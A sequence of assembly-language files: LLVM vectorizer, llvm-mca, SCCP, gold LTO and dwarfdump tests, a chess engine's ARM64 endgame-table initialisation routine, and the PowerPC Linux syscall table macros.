%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Same objects, negative induction, constant distance, just enough for vector size
; int noAlias14 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[SIZE-i-1] = Foo.A[SIZE-i-5] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias14(
; CHECK: load <4 x i32>
; CHECK: ret
define i32 @noAlias14(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 5
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub2 = sub nsw i32 100, %4
%sub3 = sub nsw i32 %sub2, 1
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub3
store i32 %add, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx5, align 4
ret i32 %7
}
;; === Now, the tests that we could vectorize with induction changes or run-time checks ===
; /// Different objects, swapped induction, alias at the end
; int mayAlias01 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i] = Foo.B[SIZE-i-1] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mayAlias01(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mayAlias01(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Different objects, swapped induction, alias at the beginning
; int mayAlias02 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[SIZE-i-1] = Foo.B[i] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mayAlias02(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mayAlias02(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %4
%sub1 = sub nsw i32 %sub, 1
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub1
store i32 %add, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Pointer access, run-time check added
; int mayAlias03 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; *(PA+i) = *(PB+SIZE-i-1) + a;
; return *(PA+a);
; }
; CHECK-LABEL: define i32 @mayAlias03(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mayAlias03(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32*, i32** @PB, align 4
%add.ptr = getelementptr inbounds i32, i32* %1, i32 100
%2 = load i32, i32* %i, align 4
%idx.neg = sub i32 0, %2
%add.ptr1 = getelementptr inbounds i32, i32* %add.ptr, i32 %idx.neg
%add.ptr2 = getelementptr inbounds i32, i32* %add.ptr1, i32 -1
%3 = load i32, i32* %add.ptr2, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32*, i32** @PA, align 4
%6 = load i32, i32* %i, align 4
%add.ptr3 = getelementptr inbounds i32, i32* %5, i32 %6
store i32 %add, i32* %add.ptr3, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32*, i32** @PA, align 4
%9 = load i32, i32* %a.addr, align 4
%add.ptr4 = getelementptr inbounds i32, i32* %8, i32 %9
%10 = load i32, i32* %add.ptr4, align 4
ret i32 %10
}
;; === Finally, the tests that should only vectorize with care (or if we ignore undefined behaviour altogether) ===
; int mustAlias01 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i+10] = Foo.B[SIZE-i-1] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mustAlias01(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mustAlias01(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%add2 = add nsw i32 %4, 10
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %add2
store i32 %add, i32* %arrayidx3, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx4, align 4
ret i32 %7
}
; int mustAlias02 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i] = Foo.B[SIZE-i-10] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mustAlias02(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mustAlias02(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 10
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; int mustAlias03 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i+10] = Foo.B[SIZE-i-10] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mustAlias03(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mustAlias03(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 10
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%add2 = add nsw i32 %4, 10
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %add2
store i32 %add, i32* %arrayidx3, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx4, align 4
ret i32 %7
}
| {
"language": "Assembly"
} |
macro GetKeys Wp, Wn, Wb, Wr, Wq, Bp, Bn, Bb, Br, Bq
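; builds the two material keys for the piece counts given as arguments:
; x1 = key for the configuration as written (white as the strong side),
; x2 = key for the same material with the colours swapped.
; x28/x29 are assumed to hold the white/black Zobrist piece tables, as
; set up in Endgame_Init below; clobbers x0.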
ldr x0, [x28, 8*(64*King + 0)]
ldr x1, [x29, 8*(64*King + 0)]
eor x1, x1, x0
mov x2, x1
picnt = 0
repeat Wp
ldr x0, [x28, 8*(64*Pawn + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Pawn + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Bp
ldr x0, [x29, 8*(64*Pawn + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Pawn + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Wn
ldr x0, [x28, 8*(64*Knight + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Knight + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Bn
ldr x0, [x29, 8*(64*Knight + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Knight + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Wb
ldr x0, [x28, 8*(64*Bishop + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Bishop + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Bb
ldr x0, [x29, 8*(64*Bishop + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Bishop + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Wr
ldr x0, [x28, 8*(64*Rook + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Rook + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Br
ldr x0, [x29, 8*(64*Rook + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Rook + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Wq
ldr x0, [x28, 8*(64*Queen + picnt)]
eor x1, x1, x0
ldr x0, [x29, 8*(64*Queen + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
picnt = 0
repeat Bq
ldr x0, [x29, 8*(64*Queen + picnt)]
eor x1, x1, x0
ldr x0, [x28, 8*(64*Queen + picnt)]
eor x2, x2, x0
picnt = picnt + 1
end repeat
end macro
Endgame_Init:
; make sure all of our functions are registered with
; EndgameEval_Map
; EndgameScale_Map
; EndgameEval_FxnTable
; EndgameScale_FxnTable
stp x29, x30, [sp, -16]!
lea x28, Zobrist_Pieces
add x29, x28, 8*64*8
; eval
lea x21, EndgameEval_FxnTable
lea x15, EndgameEval_Map
; these endgame fxns correspond to a specific material config
; and are added to the map
GetKeys 1,0,0,0,0, 0,0,0,0,0
adr x0, EndgameEval_KPK
mov x14, EndgameEval_KPK_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,2,0,0,0, 0,0,0,0,0
adr x0, EndgameEval_KNNK
mov x14, EndgameEval_KNNK_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,1,1,0,0, 0,0,0,0,0
adr x0, EndgameEval_KBNK
mov x14, EndgameEval_KBNK_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,1,0, 1,0,0,0,0
adr x0, EndgameEval_KRKP
mov x14, EndgameEval_KRKP_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,1,0, 0,0,1,0,0
adr x0, EndgameEval_KRKB
mov x14, EndgameEval_KRKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,1,0, 0,1,0,0,0
adr x0, EndgameEval_KRKN
mov x14, EndgameEval_KRKN_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,0,1, 1,0,0,0,0
adr x0, EndgameEval_KQKP
mov x14, EndgameEval_KQKP_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 0,0,0,0,1, 0,0,0,1,0
adr x0, EndgameEval_KQKR
mov x14, EndgameEval_KQKR_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
 ; these endgame fxns correspond to many material configs
 ; and are not added to the map
adr x0, EndgameEval_KXK
mov x14, EndgameEval_KXK_index
str x0, [x21, x14, lsl 3]
; scale
lea x21, EndgameScale_FxnTable
lea x15, EndgameScale_Map
; these endgame fxns correspond to a specific material config
; and are added to the map
GetKeys 1,1,0,0,0, 0,0,0,0,0
adr x0, EndgameScale_KNPK
mov x14, EndgameScale_KNPK_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,1,0,0,0, 0,0,1,0,0
adr x0, EndgameScale_KNPKB
mov x14, EndgameScale_KNPKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,0,0,1,0, 0,0,0,1,0
adr x0, EndgameScale_KRPKR
mov x14, EndgameScale_KRPKR_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,0,0,1,0, 0,0,1,0,0
adr x0, EndgameScale_KRPKB
mov x14, EndgameScale_KRPKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,0,1,0,0, 0,0,1,0,0
adr x0, EndgameScale_KBPKB
mov x14, EndgameScale_KBPKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 1,0,1,0,0, 0,1,0,0,0
adr x0, EndgameScale_KBPKN
mov x14, EndgameScale_KBPKN_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 2,0,1,0,0, 0,0,1,0,0
adr x0, EndgameScale_KBPPKB
mov x14, EndgameScale_KBPPKB_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
GetKeys 2,0,0,1,0, 1,0,0,1,0
adr x0, EndgameScale_KRPPKRP
mov x14, EndgameScale_KRPPKRP_index
str x0, [x21, x14, lsl 3]
bl .Map_Insert
 ; these endgame fxns correspond to many material configs except KPKP
 ; and are not added to the map
adr x0, EndgameScale_KBPsK
mov x14, EndgameScale_KBPsK_index
str x0, [x21, x14, lsl 3]
adr x0, EndgameScale_KQKRPs
mov x14, EndgameScale_KQKRPs_index
str x0, [x21, x14, lsl 3]
adr x0, EndgameScale_KPsK
mov x14, EndgameScale_KPsK_index
str x0, [x21, x14, lsl 3]
adr x0, EndgameScale_KPKP
mov x14, EndgameScale_KPKP_index
str x0, [x21, x14, lsl 3]
lea x0, PushToEdges
adr x1, .PushToEdges
mov x2, 64
bl MemoryCopy
lea x0, PushToCorners
adr x1, .PushToCorners
mov x2, 64
bl MemoryCopy
lea x0, PushClose
adr x1, .PushClose
mov x2, 8
bl MemoryCopy
lea x0, PushAway
adr x1, .PushAway
mov x2, 8
bl MemoryCopy
ldp x29, x30, [sp], 16
ret
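; 8x8 per-square tables used by the mating evaluators: bonuses for
; driving the losing king to the board edge or into a corner, plus two
; 8-entry tables indexed by king distance (PushClose rewards keeping
; the kings near each other, PushAway rewards separation).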
.PushToEdges:
db 100, 90, 80, 70, 70, 80, 90, 100
db 90, 70, 60, 50, 50, 60, 70, 90
db 80, 60, 40, 30, 30, 40, 60, 80
db 70, 50, 30, 20, 20, 30, 50, 70
db 70, 50, 30, 20, 20, 30, 50, 70
db 80, 60, 40, 30, 30, 40, 60, 80
db 90, 70, 60, 50, 50, 60, 70, 90
db 100, 90, 80, 70, 70, 80, 90, 100
.PushToCorners:
db 200, 190, 180, 170, 160, 150, 140, 130
db 190, 180, 170, 160, 150, 140, 130, 140
db 180, 170, 155, 140, 140, 125, 140, 150
db 170, 160, 140, 120, 110, 140, 150, 160
db 160, 150, 140, 110, 120, 140, 160, 170
db 150, 140, 125, 140, 140, 155, 170, 180
db 140, 130, 140, 150, 160, 170, 180, 190
db 130, 140, 150, 160, 170, 180, 190, 200
.PushClose:
db 0, 0, 100, 80, 60, 40, 20, 10
.PushAway:
db 0, 5, 20, 40, 60, 80, 90, 100
.Map_Insert:
; in: x1 hash with strongside=0
; x2 hash with strongside=1 (material flipped)
; x14 index of fxn
; x15 address EndgameEval_Map or EndgameScale_Map
; we simply insert the two entries x1 and x2 into the assumed
; sorted array of EndgameMapEntry structs, sorted by key
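 ; equivalent C sketch (hypothetical names, illustration only):
 ;   typedef struct { uint64_t key, fxn; } EndgameMapEntry;
 ;   void insert(EndgameMapEntry *e, uint64_t key, uint64_t fxn) {
 ;       while (e->fxn != 0 && e->key < key) e++;  /* find slot */
 ;       while (fxn != 0) {                        /* shift tail up one */
 ;           uint64_t k = e->key, f = e->fxn;
 ;           e->key = key; e->fxn = fxn;
 ;           key = k; fxn = f; e++;
 ;       }
 ;   }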
stp x29, x30, [sp, -16]!
add x14, x14, x14
stp x2, x14, [sp, -16]!
bl .Insert
ldp x1, x14, [sp], 16
add x14, x14, 1
bl .Insert
ldp x29, x30, [sp], 16
ret
.Insert:
; in: x1 key to insert
; x14 entry
sub x4, x15, sizeof.EndgameMapEntry
.Next:
ldp x0, x2, [x4, sizeof.EndgameMapEntry]!
cbz x2, .AtEnd
cmp x1, x0
bhi .Next
.Found:
ldp x0, x2, [x4]
.AtEnd:
stp x1, x14, [x4], sizeof.EndgameMapEntry
mov x1, x0
mov x14, x2
cbnz x2, .Found
ret
| {
"language": "Assembly"
} |
# NOTE: Assertions have been autogenerated by utils/update_mca_test_checks.py
# RUN: llvm-mca -mtriple=x86_64-unknown-unknown -mcpu=btver2 -iterations=1 -resource-pressure=0 -timeline < %s | FileCheck %s
imull %esi
imull (%rdi)
# The second integer multiply can start at cycle 2 because the implicit reads
# can start after the load operand is evaluated.
# CHECK: Iterations: 1
# CHECK-NEXT: Instructions: 2
# CHECK-NEXT: Total Cycles: 10
# CHECK-NEXT: Total uOps: 4
# CHECK: Dispatch Width: 2
# CHECK-NEXT: uOps Per Cycle: 0.40
# CHECK-NEXT: IPC: 0.20
# CHECK-NEXT: Block RThroughput: 2.0
# CHECK: Instruction Info:
# CHECK-NEXT: [1]: #uOps
# CHECK-NEXT: [2]: Latency
# CHECK-NEXT: [3]: RThroughput
# CHECK-NEXT: [4]: MayLoad
# CHECK-NEXT: [5]: MayStore
# CHECK-NEXT: [6]: HasSideEffects (U)
# CHECK: [1] [2] [3] [4] [5] [6] Instructions:
# CHECK-NEXT: 2 3 1.00 imull %esi
# CHECK-NEXT: 2 6 1.00 * imull (%rdi)
# CHECK: Timeline view:
# CHECK-NEXT: Index 0123456789
# CHECK: [0,0] DeeeER . imull %esi
# CHECK-NEXT: [0,1] .DeeeeeeER imull (%rdi)
# CHECK: Average Wait times (based on the timeline view):
# CHECK-NEXT: [0]: Executions
# CHECK-NEXT: [1]: Average time spent waiting in a scheduler's queue
# CHECK-NEXT: [2]: Average time spent waiting in a scheduler's queue while ready
# CHECK-NEXT: [3]: Average time elapsed from WB until retire stage
# CHECK: [0] [1] [2] [3]
# CHECK-NEXT: 0. 1 1.0 1.0 0.0 imull %esi
# CHECK-NEXT: 1. 1 1.0 1.0 0.0 imull (%rdi)
| {
"language": "Assembly"
} |
# NOTE: Assertions have been autogenerated by utils/update_mca_test_checks.py
# RUN: llvm-mca -march=aarch64 -mcpu=cyclone -resource-pressure=false < %s | FileCheck %s
ldr x7, [x1, #8]
ldr x6, [x1, x2]
ldr x4, [x1, x2, sxtx]
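# The three loads exercise immediate-offset, register-offset, and
# sign-extended register-offset addressing; on Cyclone the register
# forms are expected to cost an extra micro-op and one more cycle of
# latency (see the #uOps and Latency columns below).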
# CHECK: Iterations: 100
# CHECK-NEXT: Instructions: 300
# CHECK-NEXT: Total Cycles: 157
# CHECK-NEXT: Total uOps: 500
# CHECK: Dispatch Width: 6
# CHECK-NEXT: uOps Per Cycle: 3.18
# CHECK-NEXT: IPC: 1.91
# CHECK-NEXT: Block RThroughput: 1.5
# CHECK: Instruction Info:
# CHECK-NEXT: [1]: #uOps
# CHECK-NEXT: [2]: Latency
# CHECK-NEXT: [3]: RThroughput
# CHECK-NEXT: [4]: MayLoad
# CHECK-NEXT: [5]: MayStore
# CHECK-NEXT: [6]: HasSideEffects (U)
# CHECK: [1] [2] [3] [4] [5] [6] Instructions:
# CHECK-NEXT: 1 4 0.50 * ldr x7, [x1, #8]
# CHECK-NEXT: 2 5 0.50 * ldr x6, [x1, x2]
# CHECK-NEXT: 2 5 0.50 * ldr x4, [x1, x2, sxtx]
| {
"language": "Assembly"
} |
; RUN: opt -sccp -S < %s | FileCheck %s
target datalayout = "e-p:32:32:32-i1:8:8-i8:8:8-i16:16:16-i32:32:32-i64:32:64-f32:32:32-f64:32:64-v64:64:64-v128:128:128-a0:0:64-f80:128:128-n8:16:32-S128"
; CHECK: store volatile <2 x i64> zeroinitializer, <2 x i64>* %p
; rdar://11324230
define void @foo(<2 x i64>* %p) nounwind {
entry:
br label %while.body.i
while.body.i: ; preds = %while.body.i, %entry
%vWorkExponent.i.033 = phi <4 x i32> [ %sub.i.i, %while.body.i ], [ <i32 939524096, i32 939524096, i32 939524096, i32 939524096>, %entry ]
%sub.i.i = add <4 x i32> %vWorkExponent.i.033, <i32 -8388608, i32 -8388608, i32 -8388608, i32 -8388608>
%0 = bitcast <4 x i32> %sub.i.i to <2 x i64>
%and.i119.i = and <2 x i64> %0, zeroinitializer
store volatile <2 x i64> %and.i119.i, <2 x i64>* %p
br label %while.body.i
}
| {
"language": "Assembly"
} |
; RUN: llvm-as %s -o %t.o
; RUN: %gold -plugin %llvmshlibdir/LLVMgold%shlibext \
; RUN: -m elf_x86_64 --plugin-opt=emit-asm \
; RUN: -shared %t.o -o %t2.s
; RUN: FileCheck --input-file %t2.s %s
; RUN: %gold -plugin %llvmshlibdir/LLVMgold%shlibext \
; RUN: -m elf_x86_64 --plugin-opt=emit-asm --plugin-opt=lto-partitions=2\
; RUN: -shared %t.o -o %t2.s
; RUN: cat %t2.s %t2.s1 > %t3.s
; RUN: FileCheck --input-file %t3.s %s
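; With lto-partitions=2 the plugin splits codegen into two partitions,
; emitting %t2.s and %t2.s1; concatenating them lets the same CHECK-DAG
; lines verify that each function landed in one of the partitions.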
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"
; CHECK-DAG: f1:
define void @f1() {
ret void
}
; CHECK-DAG: f2:
define void @f2() {
ret void
}
| {
"language": "Assembly"
} |
/*
* This file contains the table of syscall-handling functions.
* Copyright (C) 1995-1996 Gary Thomas (gdt@linuxppc.org)
*
* Largely rewritten by Cort Dougan (cort@cs.nmt.edu)
* and Paul Mackerras.
*
* Adapted for iSeries by Mike Corrigan (mikejc@us.ibm.com)
* PPC64 updates by Dave Engebretsen (engebret@us.ibm.com)
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*/
#include <asm/ppc_asm.h>
#ifdef CONFIG_PPC64
#define SYSCALL(func) .llong .sys_##func,.sys_##func
#define COMPAT_SYS(func) .llong .sys_##func,.compat_sys_##func
#define PPC_SYS(func) .llong .ppc_##func,.ppc_##func
#define OLDSYS(func) .llong .sys_ni_syscall,.sys_ni_syscall
#define SYS32ONLY(func) .llong .sys_ni_syscall,.compat_sys_##func
#define SYSX(f, f3264, f32) .llong .f,.f3264
#else
#define SYSCALL(func) .long sys_##func
#define COMPAT_SYS(func) .long sys_##func
#define PPC_SYS(func) .long ppc_##func
#define OLDSYS(func) .long sys_##func
#define SYS32ONLY(func) .long sys_##func
#define SYSX(f, f3264, f32) .long f32
#endif
#define SYSCALL_SPU(func) SYSCALL(func)
#define COMPAT_SYS_SPU(func) COMPAT_SYS(func)
#define PPC_SYS_SPU(func) PPC_SYS(func)
#define SYSX_SPU(f, f3264, f32) SYSX(f, f3264, f32)
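/* For example, SYSCALL(read) expands to ".llong .sys_read,.sys_read"
 * on ppc64 (first column: native 64-bit entry, second: 32-bit compat
 * entry, both via the dot-symbol entry points) and to ".long sys_read"
 * on 32-bit. */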
#ifdef CONFIG_PPC64
#define sys_sigpending sys_ni_syscall
#define sys_old_getrlimit sys_ni_syscall
.p2align 3
#endif
_GLOBAL(sys_call_table)
#include <asm/systbl.h>
| {
"language": "Assembly"
} |
RUN: llvm-dwarfdump -v %p/Inputs/dwarfdump-dwp.x86_64.o | FileCheck %s
; Testing the following simple dwp file:
; a.cpp:
; struct foo { };
; foo a;
; b.cpp:
; struct bar { };
; bar b() {
; }
; CHECK-NOT: .debug_info contents:
; CHECK-LABEL: .debug_info.dwo contents:
; CHECK: Compile Unit
; Verify that the second CU uses the index for its abbrev offset
